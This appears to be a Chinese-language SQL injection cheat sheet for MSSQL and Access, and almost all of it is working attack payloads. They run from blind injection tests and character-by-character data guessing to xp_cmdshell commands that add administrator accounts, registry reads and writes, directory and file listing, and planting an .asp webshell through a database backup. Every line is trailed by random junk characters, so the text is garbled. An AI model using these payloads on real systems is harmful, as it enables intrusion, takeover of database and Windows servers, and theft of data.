1.判断是否有注入;and 1=1 ;and 1=2 99~ZZG
2.初步判断是否是mssql ;and user>0 x$KQ*P~q
L#fS P
3.注入参数是字符'and [查询条件] and ''=' J]|S0JC`
40$9./fe)
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S*%:ID|/C2
T#a6X;9P
5.判断数据库系统 S"/gZfxer
`+(4t4@ew
;and (select count(*) from sysobjects)>0 mssql 7e
/Kh)5G
VM+l9z>
;and (select count(*) from msysobjects)>0 access G{0f*
cH)
!J(6E:,b#
u?KG%
+f,I$&d.V
6.猜数据库 ;and (select Count(*) from [数据库名])>0 tDtqTB}
Qm4cuV-0{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 5Zl7crA [
z5W;-sCz
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 J7k=5Fqej;
5"w%
9.(1)猜字段的ascii值(access) Tx(=4ALY
7eG@)5Uy
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 c+jnQM'
i}>}%l|
(2)猜字段的ascii值(mssql) Oyp)Wm;@
._<gc;G
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 be'&tsZ9
%3T:W\h
10.测试权限结构(mssql) GuQ#
i|fkwV,5
>HRLL\u9
;V^ I>-fnm
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 2G$-:4B
9HAK
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ~TjTd
`!.c_%m2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- [yVcH3GcjI
'h 7n}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- :KsBJ>2ck
4}Hf"L[ l
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- F>at^6^
]CgZt'h{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- jyC>~}?
hcQv!!Q"k$
;and 1=(select IS_MEMBER('db_owner'));-- CN7qqd
S.^x)5/,,T
[H>/N7v19*
,62BZyT,T,
11.添加mssql和系统的帐户 2Oy-jM
fw0Z- 9*
;exec master.dbo.sp_addlogin username;-- N~B'gJJDx
;exec master.dbo.sp_password null,username,password;-- jxnb<!|?H@
tfjb G;R
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- /P*ph0S-
,J'@e+jV
;exec master.dbo.xp_cmdshell 'net user username password qb5IpI{U
;o.,vQF*
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- > u=nGeO
"H}ae7@
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #DcK{|ty
K_V$ ktL
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- yJw4!A 1!
;+Mr|vweTC
!}HT&N8[r
bfA9aT
12.(1)遍历目录 v9Ez0 :)
bM
$WU?Z
;create table dirs(paths varchar(100), id int) 'Y5=A!*@tf
62#8c~dL
;insert dirs exec master.dbo.xp_dirtree 'c:\' CvqUaHW@
;sd] IZ$#
;and (select top 1 paths from dirs)>0 YHr<`Q</
~<[]l~`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) iPrAB*
Dz+R Q`Vn
}fz;La:b
*1_A$14l
(2)遍历目录 5@~5RNrq2
a4N8zDS
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- FBrJVaF
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 t8-LPq
!_h<w ?)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 }Yp]A
=JB1 ]b{|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1iE*-K%Q
k!m9
l1x
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 K|-RAjE
[E/8E
h<
z#sSLE.$Z
P4~C0z
13.mssql中的存储过程 N9cUlrDO
^v@&
q
xp_regenumvalues 注册表根键, 子键 U+g<lgH1J
vjD||!g'
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 on0>_-n)
Y ptP_R:2p
xp_regread 根键,子键,键值名 sTO9>~sj
Z6oA>D
;exec xp_regread 0G/_"}@
)UG<KcdI
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 MIwkFI8
!,>9?(
xp_regwrite 根键,子键, 值名, 值类型, 值 I`EgR?5 `
PiwI.c
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !:Clzlg
Q
GDfX_
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 kM/;R)3t4/
;923^*\:F{
xp_regdeletevalue 根键,子键,值名 >zB0+l
I ?i,21:5
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 CT#N9
|HB
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
8Wyv!tL
I;Bci m;
OAtn.LU
Tta+qjr
14.mssql的backup创建webshell @60/IE{-v
-m>ng
E~q
use model qW:\6aEG
&sJ%ur+G
create table cmd(str image); d512Y[ R
z[ ml;?
insert into cmd(str) values (''); J2~oIe2!+
"+J[7p}`@
backup database model to disk='c:\l.asp'; I%31MU9
pwO
U6A!
j#E&u*IR
|\
4cQ
15.mssql内置函数 B":u5_B
&c1zEgl
;and (select @@version)>0 获得Windows的版本号 :u>9H{a
\d{S3\7
;and user_name()='dbo' 判断当前系统的连接用户是不是sa >D/+04w
B>W!RyH8o
;and (select user_name())>0 爆当前系统的连接用户 2s:$4]K D
}N<> z
;and (select db_name())>0 得到当前连接的数据库 G8_|w6
. 'rC'FT
SV96eYT<
O<?z\yBtS^
16.简洁的webshell -|~tZuf
,BG
L|5?3z
use model 9N]V F'
2DTBL:?`
create table cmd(str image); ,,[pc
:IlJQ{=W
insert into cmd(str) values (''); 'VTLp.~G~
rfS kQT
backup database model to disk='g:\wwwtest\l.asp';